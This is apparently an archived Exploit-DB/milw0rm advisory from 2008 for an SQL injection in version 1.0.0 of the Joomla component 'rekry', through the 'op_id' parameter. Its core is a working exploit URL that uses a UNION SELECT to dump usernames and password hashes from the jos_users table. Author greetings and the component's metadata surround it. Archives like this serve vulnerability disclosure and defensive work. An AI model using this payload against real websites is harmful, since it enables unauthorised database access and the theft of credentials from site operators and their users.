Joomla! Component rekry 1.0.0 - 'op_id' SQL Injection

EDB-ID:

5297




Platform:

PHP

Date:

2008-03-23


@ Joomla component rekry!Joom (op_id) <=1.0.0 SQL injectIon.


Author:Sniper456

Contact:Sniper456[attt]gmail.com

Greetss: My chilean people

Developer:Matti Kiviharju


**Bug:

http://www.target.com/index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL]

**Example

http://www.target.com/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--



# Fro000M CHILE my frieeeenD! 2008 # /* Grande colo colo */

side note:
  <name>rekry</name>
  <creationDate>18.07.2006</creationDate>
  <author>Matti Kiviharju</author>
  <copyright>Copyright 2006 by Matti Kiviharju. All rights reserved!</copyright>
  <authorEmail>info@teknologiaplaneetta.com</authorEmail>

  <authorUrl>www.teknologiaplaneetta.com</authorUrl>
  <version>1.0.0</version>
  <description>This component allows careers to send their career info to databese!</description>

# milw0rm.com [2008-03-23]